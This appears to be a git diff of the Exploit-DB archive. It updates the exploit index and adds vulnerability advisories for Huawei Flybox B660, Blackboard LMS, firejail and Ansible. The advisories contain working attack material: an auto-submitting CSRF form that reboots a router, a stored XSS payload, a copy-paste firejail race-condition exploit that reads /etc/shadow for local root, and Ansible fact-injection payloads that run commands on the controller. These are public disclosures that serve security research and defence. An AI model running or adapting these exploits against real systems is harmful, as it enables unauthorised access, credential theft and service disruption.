27648,platforms/php/webapps/27648.txt,"MODx CMS 0.9.1 - 'index.php' Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps,0
@ -29506,10 +29515,10 @@ id,file,description,date,author,platform,type,port
28090,platforms/php/webapps/28090.txt,"Woltlab Burning Board 1.2/2.0/2.3 - report.php postid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0
28091,platforms/php/webapps/28091.txt,"Woltlab Burning Board 1.2/2.0/2.3 - showmods.php boardid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0
28092,platforms/php/webapps/28092.txt,"MyBulletinBoard (MyBB) 1.0.x/1.1.x - 'usercp.php' SQL Injection",2006-06-22,imei,php,webapps,0
28093,platforms/php/webapps/28093.txt,"SoftBizScripts Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
28094,platforms/php/webapps/28094.txt,"SoftBizScripts Dating Script 1.0 - products.php cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
28095,platforms/php/webapps/28095.txt,"SoftBizScripts Dating Script 1.0 - 'index.php' cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
28096,platforms/php/webapps/28096.txt,"SoftBizScripts Dating Script 1.0 - news_desc.php id Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
28093,platforms/php/webapps/28093.txt,"SoftBizScripts Dating Script 1.0 - 'featured_photos.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
28094,platforms/php/webapps/28094.txt,"SoftBizScripts Dating Script 1.0 - 'products.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
28095,platforms/php/webapps/28095.txt,"SoftBizScripts Dating Script 1.0 - 'index.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
28096,platforms/php/webapps/28096.txt,"SoftBizScripts Dating Script 1.0 - 'news_desc.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
28097,platforms/php/webapps/28097.txt,"Dating Agent 4.7.1 - Multiple Input Validation Vulnerabilities",2006-06-22,"EllipSiS Security",php,webapps,0
28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusion",2006-06-22,Shm,php,webapps,0
28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0
@ -36943,9 +36952,16 @@ id,file,description,date,author,platform,type,port
40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0
40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0
40999,platforms/php/webapps/40999.txt,"My PHP Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
41027,platforms/php/webapps/41027.txt,"Dating Script 3.25 - SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
41001,platforms/php/webapps/41001.txt,"My PHP Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
41002,platforms/php/webapps/41002.txt,"Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection",2017-01-09,v3n0m,php,webapps,0
41004,platforms/php/webapps/41004.txt,"Starting Page 1.3 - SQL Injection",2017-01-10,JaMbA,php,webapps,0
41004,platforms/php/webapps/41004.txt,"Starting Page 1.3 - 'linkid' Parameter SQL Injection",2017-01-10,JaMbA,php,webapps,0
41005,platforms/php/webapps/41005.txt,"Freepbx < 2.11.1.5 - Remote Code Execution",2016-12-23,inj3ctor3,php,webapps,0
41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0
41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0
41009,platforms/php/webapps/41009.txt,"Starting Page 1.3 - 'category' Parameter SQL Injection",2017-01-11,"Ben Lee",php,webapps,0
41010,platforms/php/webapps/41010.txt,"My link trader 1.1 - 'id' Parameter SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
41014,platforms/java/webapps/41014.txt,"Blackboard LMS 9.1 SP14 - Cross-Site Scripting",2017-01-09,Vulnerability-Lab,java,webapps,0
41017,platforms/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-10,Vulnerability-Lab,hardware,webapps,0
41023,platforms/php/webapps/41023.txt,"Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
41024,platforms/php/webapps/41024.txt,"Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

192
platforms/hardware/webapps/41017.txt Executable file
View file

@ -0,0 +1,192 @@
Document Title:
===============
Huawei Flybox B660 - (POST Reboot) CSRF Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2025
Release Date:
=============
2017-01-10
Vulnerability Laboratory ID (VL-ID):
====================================
2025
Common Vulnerability Scoring System:
====================================
4.4
Product & Service Introduction:
===============================
The Huawei B660 has a web interface for configuration. You can use any web browser you like to login to the Huawei B660.
(Copy of the Homepage: http://setuprouter.com/router/huawei/b660/manual-1184.pdf )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a security flaw that affects the official Huawei Flybox B660 3G/4G router product series.
Vulnerability Disclosure Timeline:
==================================
2017-01-10: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Huawei
Product: Flybox - Router (Web-Application) B660 3G/4G
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A remote cross-site request forgery (CSRF) vulnerability has been discovered in the official Huawei Flybox B660 3G/4G router product series.
The security vulnerability allows remote attackers to submit special requests to the affected product which could lead reboot the Product.
The vulnerability is located in the `/htmlcode/html/reboot.cgi` and `/htmlcode/html/system_reboot.asp` file modules and `RequestFile`
parameter of the localhost path URL. Remote attackers are able to reboot any Huawei Flybox B660 via unauthenticated POST method request.
The security risk of the csrf web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.4.
Exploitation of the csrf web vulnerability requires a low privilege web-application user account and medium or high user interaction.
Successful exploitation of the vulnerability results in unauthenticated application requests and manipulation of affected or connected
device backend modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /htmlcode/html/reboot.cgi
[+] /htmlcode/html/system_reboot.asp
Vulnerable Parameter(s):
[+] RequestFile
Software version of the modem:
1066.12.15.01.200
Hardware version of the modem:
WLB3TCLU
Name of the device:
B660
Hardware version of the router:
WL1B660I001
Software version of the router:
1066.11.15.02.110sp01
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without privilege web-application user account and with medium or high user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
--- PoC Session Logs ---
POST /htmlcode/html/reboot.cgi?RequestFile=/htmlcode/html/system_reboot.asp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: localhost/htmlcode/html/system_reboot.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
HTTP/1.1 200 OK
CACHE-CONTROL: no-cache
Content-Type: text/html
Content-Length: 364
<html><script src="http://cakecdn.info/ad_20160927.js?ver=1&channel=1" id="{6AF30038-1A5F-46F9-AE73-455BB857D493}"></script>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>replace</title>
<body>
<script language="JavaScript" type="text/javascript">
var pageName = '/';
top.location.replace(pageName);
</script>
</body>
</html>
Note: Attacker are able to reboot the device itself without being authenticated to it .
Also an Attacker can put an auto-submit javascript-generated form inside an high traffic website to compromise.
PoC: CSRF Exploit
<html>
<!-- CSRF PoC By SaifAllah benMassaoud -->
<body>
<form id="test" action="http://192.168.1.1/htmlcode/html/reboot.cgi?RequestFile=/htmlcode/html/system_reboot.asp" method="POST">
</form>
<script>document.getElementById('test').submit();</script>
</body>
</html>
Security Risk:
==============
The security risk of the cross site request forgery vulnerability in the Huawei Flybox B660 3G/4G router product series is estimated as medium. (CVSS 4.4)
Credits & Authors:
==================
Vulnerability Laboratory [Research team] - SaifAllah benMassaoud - (http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

196
platforms/java/webapps/41014.txt Executable file
View file

@ -0,0 +1,196 @@
Document Title:
===============
Blackboard LMS 9.1 SP14 - (Profile) Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1900
Release Date:
=============
2017-01-09
Vulnerability Laboratory ID (VL-ID):
====================================
1900
Common Vulnerability Scoring System:
====================================
4.2
Product & Service Introduction:
===============================
Blackboard Learn (previously the Blackboard Learning Management System), is a virtual learning environment and course management system
developed by Blackboard Inc. It is Web-based server software which features course management, customizable open architecture, and scalable
design that allows integration with student information systems and authentication protocols. It may be installed on local servers or hosted
by Blackboard ASP Solutions. Its main purposes are to add online elements to courses traditionally delivered face-to-face and to develop
completely online courses with few or no face-to-face meetings.
(Copy of the Homepage: http://www.blackboard.com/learning-management-system/blackboard-learn.aspx )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side input validation vulnerability in the official Blackboard LMS 9.1 SP14.
Vulnerability Disclosure Timeline:
==================================
2017-01-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
BlackBoard Inc.
Product: Blackboard LMS - Content Management System 9.1 SP 14
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered in Blackboard LMS official web-application.
Remote attackers are able to inject malicious code into profile information module, the vulnerability is located in
the first name,last name of user profile, the vulnerable fields in the module (userVO.firstName & userVO.lastName).
The issue allows an attacker to inject own malicious java script codes to the vulnerable modules context. The execution
of the vulnerability occurs in Blackboard LMS main panel & user management module. Due to our investigation we discovered
that users with low privileged access are able to to inject their own java code to compromise other moderator or admin
session credentials. The request method to inject is POST and the attack vector of the issue is persistent. The execute
occurs each time an account visits the profile page of the attacking user account.
The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.2
Exploitation of the web vulnerability requires a low privileged user account with restricted access and low user interaction.
Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external
redirect to malicious sources and application-side manipulation of affected or connected module context.
Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. User register in the blackboard LMS course as student .
2. User goes to profile information section and inject the code persistent payload > into the firstname or lastname input fields
Note: https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
3. User submits data and saves it via POST method request with out secure parse by the web validation
4. The execution of vulnerability occurs in the user management:
https://b-lms.localhost:8000/webapps/Bb-sites-enrollment-manager-BBLEARN/enrollmentManager.form?course_id=_431252_1
5. Successfully reproduce the application-side web validation vulnerability!
--- PoC Session Logs [POST] ---
POST /webapps/Bb-sites-user-profile-BBLEARN/profile.form HTTP/1.1
Host: b-lms.localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
Cookie: JSESSIONID=285EAF6ED95FF4574CADF4FF90F218B1; __utma=154552106.1787260759.1470597563.1470597563.1470652392.2;
__utmz=154552106.1470597563.1.1.utmcsr=vulnlab.coursesites.com|utmccn=(referral)|utmcmd=referral|utmcct=/; COOKIE_CONSENT_ACCEPTED=true;
NSC_106969_wjq_69.196.229.208.hspvq=ffffffff090d159545525d5f4f58455e445a4a42378b; session_id=153E1080C32EF7E9393910EC45598887;
s_session_id=FCCF148598E6531BC4167D5C3B8A2949; JSESSIONID=C866524B3CA437DF8E0AC184746DBD36; __utmb=154552106.26.9.1470653164713; __utmc=154552106; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 605
userVO.firstName=%3Cimg+src%3Dx+onerror%3Dprompt%284%29%3E&userVO.lastName=%3Cimg+src%3Dx+onerror%3Dprompt%284%29%3E&userVO.user.educationLevel=
Not+Disclosed&userVO.user.gender=Not+Disclosed&birthDate_datetime=&pickdate=&pickname=&birthDate_date=&userVO.user.studentId=&userType=HE_STUDENT
&userVO.user.emailAddress=sec%40secteach.me&userVO.user.street1=&userVO.user.city=&userVO.user.state=&userVO.user.zipCode=&userVO.user.country=AF
&userVO.user.mobilePhone=&userVO.user.homePhone1=&userVO.user.webPage=&userVO.userProfile.institutionGuid=User_Instr_2015-02-22_19%3A31%3A21.304
&userVO.user.jobTitle=&userVO.user.department=&top_Submit=Submit
-
RESPONSE
HTTP/1.1 200 OK
Date: Mon, 08 Aug 2016 11:06:31 GMT
Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/1.0.1g mod_jk/1.2.37
X-Blackboard-appserver: fgprd-106969-156642-app006.mhint
P3P: CP="CAO PSA OUR"
X-Blackboard-product: Blackboard Learn &#8482; 9.1.140152.0
Set-Cookie: session_id=153E1080C32EF7E9393910EC45598887; Path=/; HttpOnly
Set-Cookie: s_session_id=FCCF148598E6531BC4167D5C3B8A2949; Path=/; Secure; HttpOnly
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Fri, 18 Jul 2014 19:02:32 GMT
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html;charset=UTF-8
Reference(s):
https://b-lms.localhost:8000/
https://b-lms.localhost:8000/webapps/
https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/
https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse or encode of the vulnerable firstname and lastname input fields.
Disallow the usage of special chars and filter the entries by an escape. Parse the output context in the profile.form to
prevent application-side executions.
Security Risk:
==============
The security risk of the application-side input validation vulnerabilities in the user profile section is estimated as medium. (CVSS 4.2)
Credits & Authors:
==================
Vulnerability Lab [Research Team] - Lawrence Amer (http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

316
platforms/linux/local/41022.txt Executable file
View file

@ -0,0 +1,316 @@
# firejail advisory for TOCTOU in --get and --put (local root)
Releasing a brief advisory/writeup about a local root privesc found in firejail that we reported back in Nov, 2016. This is in response to a recent [thread](http://seclists.org/oss-sec/2017/q1/20) on oss-sec where people seem interested in details of firejail security issues. This particular vulnerability was fixed in commit [e152e2d](https://github.com/netblue30/firejail/commit/e152e2d067e17be33c7e82ce438c8ae740af6a66) but no CVE was assigned.
## Vulnerability
This is a TOCTOU (race condition) bug when testing access permissions with access() and then calling copy_file(). At the time of discovery, it was clear the code suffered from many insecure coding constructs like this and much more -- but there was no guideline around making security related bug reports (other than using the public issue tracker).
### Code: src/firejail/ls.c
~~~~
void sandboxfs(int op, pid_t pid, const char *path) {
EUID_ASSERT();
// if the pid is that of a firejail process, use the pid of the first child process
EUID_ROOT();
char *comm = pid_proc_comm(pid);
EUID_USER();
if (comm) {
if (strcmp(comm, "firejail") == 0) {
pid_t child;
if (find_child(pid, &child) == 0) {
pid = child;
}
}
free(comm);
}
// check privileges for non-root users
uid_t uid = getuid();
if (uid != 0) {
uid_t sandbox_uid = pid_get_uid(pid);
if (uid != sandbox_uid) {
fprintf(stderr, "Error: permission denied.\n");
exit(1);
}
}
// full path or file in current directory?
char *fname;
if (*path == '/') {
fname = strdup(path);
if (!fname)
errExit("strdup");
}
else if (*path == '~') {
if (asprintf(&fname, "%s%s", cfg.homedir, path + 1) == -1)
errExit("asprintf");
}
else {
fprintf(stderr, "Error: Cannot access %s\n", path);
exit(1);
}
// sandbox root directory
char *rootdir;
if (asprintf(&rootdir, "/proc/%d/root", pid) == -1)
errExit("asprintf");
if (op == SANDBOX_FS_LS) {
EUID_ROOT();
// chroot
if (chroot(rootdir) < 0)
errExit("chroot");
if (chdir("/") < 0)
errExit("chdir");
// access chek is performed with the real UID
if (access(fname, R_OK) == -1) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
// list directory contents
struct stat s;
if (stat(fname, &s) == -1) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
if (S_ISDIR(s.st_mode)) {
char *rp = realpath(fname, NULL);
if (!rp) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
if (arg_debug)
printf("realpath %s\n", rp);
char *dir;
if (asprintf(&dir, "%s/", rp) == -1)
errExit("asprintf");
print_directory(dir);
free(rp);
free(dir);
}
else {
char *rp = realpath(fname, NULL);
if (!rp) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
if (arg_debug)
printf("realpath %s\n", rp);
char *split = strrchr(rp, '/');
if (split) {
*split = '\0';
char *rp2 = split + 1;
if (arg_debug)
printf("path %s, file %s\n", rp, rp2);
print_file_or_dir(rp, rp2, 1);
}
free(rp);
}
}
// get file from sandbox and store it in the current directory
else if (op == SANDBOX_FS_GET) {
// check source file (sandbox)
char *src_fname;
if (asprintf(&src_fname, "%s%s", rootdir, fname) == -1)
errExit("asprintf");
EUID_ROOT();
struct stat s;
if (stat(src_fname, &s) == -1) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
// try to open the source file - we need to chroot
pid_t child = fork();
if (child < 0)
errExit("fork");
if (child == 0) {
// chroot
if (chroot(rootdir) < 0)
errExit("chroot");
if (chdir("/") < 0)
errExit("chdir");
// drop privileges
drop_privs(0);
// try to read the file
if (access(fname, R_OK) == -1) {
fprintf(stderr, "Error: Cannot read %s\n", fname);
exit(1);
}
exit(0);
}
// wait for the child to finish
int status = 0;
waitpid(child, &status, 0);
if (WIFEXITED(status) && WEXITSTATUS(status) == 0);
else
exit(1);
EUID_USER();
// check destination file (host)
char *dest_fname = strrchr(fname, '/');
if (!dest_fname || *(++dest_fname) == '\0') {
fprintf(stderr, "Error: invalid file name %s\n", fname);
exit(1);
}
if (access(dest_fname, F_OK) == -1) {
// try to create the file
FILE *fp = fopen(dest_fname, "w");
if (!fp) {
fprintf(stderr, "Error: cannot create %s\n", dest_fname);
exit(1);
}
fclose(fp);
}
else {
if (access(dest_fname, W_OK) == -1) {
fprintf(stderr, "Error: cannot write %s\n", dest_fname);
exit(1);
}
}
// copy file
EUID_ROOT();
copy_file(src_fname, dest_fname, getuid(), getgid(), 0644);
printf("Transfer complete\n");
EUID_USER();
}
free(fname);
free(rootdir);
exit(0);
}
~~~~
### Code: src/firejail/util.c
~~~~
int copy_file(const char *srcname, const char *destname, uid_t uid, gid_t gid, mode_t mode) {
assert(srcname);
assert(destname);
// open source
int src = open(srcname, O_RDONLY);
if (src < 0) {
fprintf(stderr, "Warning: cannot open %s, file not copied\n", srcname);
return -1;
}
// open destination
int dst = open(destname, O_CREAT|O_WRONLY|O_TRUNC, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);
if (dst < 0) {
fprintf(stderr, "Warning: cannot open %s, file not copied\n", destname);
close(src);
return -1;
}
// copy
ssize_t len;
static const int BUFLEN = 1024;
unsigned char buf[BUFLEN];
while ((len = read(src, buf, BUFLEN)) > 0) {
int done = 0;
while (done != len) {
int rv = write(dst, buf + done, len - done);
if (rv == -1) {
close(src);
close(dst);
return -1;
}
done += rv;
}
}
if (fchown(dst, uid, gid) == -1)
errExit("fchown");
if (fchmod(dst, mode) == -1)
errExit("fchmod");
close(src);
close(dst);
return 0;
}
</snip>
~~~~
## Testing
### Our Dockerfile
~~~~
FROM ubuntu:latest
ENV wdir /root/firejail
RUN apt-get update && apt-get install -y git gcc make
RUN useradd -ms /bin/bash daniel && echo "daniel:password" | chpasswd
RUN git clone https://github.com/netblue30/firejail.git ${wdir}
WORKDIR ${wdir}
RUN git reset --hard 81467143ee9c47d9c90e97fb55baf2d47702d372
RUN ./configure && make && make install
~~~~
### Our exploit
This will exploit the --get command to read /etc/shadow and print back to the console. Just copy and paste into your shell:
~~~~
#dropper
cat > gexp.sh <<GUEST_JAIL_SCRIPT_EOF
mkdir -p /tmp/exploit
cat > /tmp/exploit/gaolbreak.c <<TOCTOU_POC_END
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
int main(int argc, char **argv)
{
char *fl = "/etc/shadow";
if(argc > 1) {
fl = argv[1];
}
while(1) {
int fd = open("owned", O_CREAT | O_RDWR, 0777);
if(fd == -1) {
perror("open");
exit(1);
}
close(fd);
remove("owned");
symlink(fl, "owned");
remove("owned");
}
}
TOCTOU_POC_END
cd /tmp/exploit
gcc ./gaolbreak.c -o gaolbreak
# XXX: change argv[1] to whatever you want
./gaolbreak /etc/shadow
GUEST_JAIL_SCRIPT_EOF
# run the dropper (symlink attack) in a jail
chmod +x ./gexp.sh
firejail --noprofile --force --name=el ./gexp.sh &
# win race using the vulnerable 'firejail --get' command.
mkdir exploitel
cd exploitel
while [ 1 ] ; do nice -n 19 firejail --get=$(pgrep -f '^firejail.*--name=el' -n) /tmp/exploit/owned >/dev/null 2>&1; cat owned 2>/dev/null; done
~~~~

260
platforms/linux/remote/41013.txt Executable file
View file

@ -0,0 +1,260 @@
########### Computest security advisory CT-2017-0109 #############
Summary: Command execution on Ansible controller from host
Affected software: Ansible
CVE: CVE-2016-9587
Reference URL: https://www.computest.nl/advisories/
CT-2017-0109_Ansible.txt
Affected versions: < 2.1.4, < 2.2.1
Credit: Undisclosed at Computest (research@computest.nl)
Date of publication: January 9, 2017
During a summary code review of Ansible, Computest found and exploited several
issues that allow a compromised host to execute commands on the Ansible
controller and thus gain access to the other hosts controlled by that
controller.
This was not a full audit and further issues may or may not be present.
About Ansible
-------------
"Ansible is an open-source automation engine that automates cloud provisioning,
configuration management, and application deployment. Once installed on a
control node, Ansible, which is an agentless architecture, connects to a managed
node through the default OpenSSH connection type."
- wikipedia.org
Technical Background
--------------------
A big threat to a configuration management system like Ansible, Puppet, Salt
Stack and others, is compromise of the central node. In Ansible terms this is
called the Controller. If the Controller is compromised, an attacker has
unfettered access to all hosts that are controlled by the Controller. As such,
in any deployment, the central node receives extra attention in terms of
security measures and isolation, and threats to this node are taken even more
seriously.
Fortunately for team blue, in the case of Ansible the attack surface of the
Controller is pretty small. Since Ansible is agent-less and based on push, the
Controller does not expose any services to hosts.
A very interesting bit of attack surface though is in the Facts. When Ansible
runs on a host, a JSON object with Facts is returned to the Controller. The
Controller uses these facts for various housekeeping purposes. Some facts have
special meaning, like the fact "ansible_python_interpreter" and
"ansible_connection". The former defines the command to be run when Ansible is
looking for the python interpreter, and the second determines the host Ansible
is running against. If an attacker is able to control the first fact he can
execute an arbitrary command, and if he is able to control the second fact he is
able to execute on an arbitrary (Ansible-controlled) host. This can be set to
"local" to execute on the Controller itself.
Because of this scenario, Ansible filters out certain facts when reading the
facts that a host returns. However, we have found 6 ways to bypass this filter.
In the scenarios below, we will use the following variables:
PAYLOAD = "touch /tmp/foobarbaz"
# Define some ways to execute our payload.
LOOKUP = "lookup('pipe', '%s')" % PAYLOAD
INTERPRETER_FACTS = {
# Note that it echoes an empty dictionary {} (it's not a format string).
'ansible_python_interpreter': '%s; cat > /dev/null; echo {}' % PAYLOAD,
'ansible_connection': 'local',
# Become is usually enabled on the remote host, but on the Ansible
# controller it's likely password protected. Disable it to prevent
# password prompts.
'ansible_become': False,
}
Bypass #1: Adding a host
------------------------
Ansible allows modules to add hosts or update the inventory. This can be very
useful, for instance when the inventory needs to be retrieved from a IaaS
platform like as the AWS module does.
If we're lucky, we can guess the inventory_hostname, in which case the host_vars
are overwritten [2] and they will be in effect at the next task. If host_name
doesn't match inventory_hostname, it might get executed in the play for the next
hostgroup, also depending on the limits set on the commandline.
# (Note that when data["add_host"] is set,
# data["ansible_facts"] is ignored.)
data['add_host'] = {
# assume that host_name is the same as inventory_hostname
'host_name': socket.gethostname(),
'host_vars': INTERPRETER_FACTS,
}
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L447
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L580
Bypass #2: Conditionals
-----------------------
Ansible actions allow for conditionals. If we know the exact contents of a
"when" clause, and we register it as a fact, a special case checks whether the
"when" clause matches a variable [1]. In that case it replaces it with its
contents and evaluates [2] them.
# Known conditionals, separated by newlines
known_conditionals_str = """
ansible_os_family == 'Debian'
ansible_os_family == "Debian"
ansible_os_family == 'RedHat'
ansible_os_family == "RedHat"
ansible_distribution == "CentOS"
result|failed
item > 5
foo is defined
"""
known_conditionals = [x.strip() for x in known_conditionals_str.split('\n')]
for known_conditional in known_conditionals:
data['ansible_facts'][known_conditional] = LOOKUP
[1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/playbook/conditional.py#L118
[2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/playbook/conditional.py#L125
Bypass #3: Template injection in stat module
--------------------------------------------
The template module/action merges its results with those of the stat module.
This allows us to bypass [1][2][3] the stripping of magic variables from
ansible_facts [4], because they're at an unexpected location in the result tree.
data.update({
'stat': {
'exists': True,
'isdir': False,
'checksum': {
'rc': 0,
'ansible_facts': INTERPRETER_FACTS,
},
}
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L39
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L49
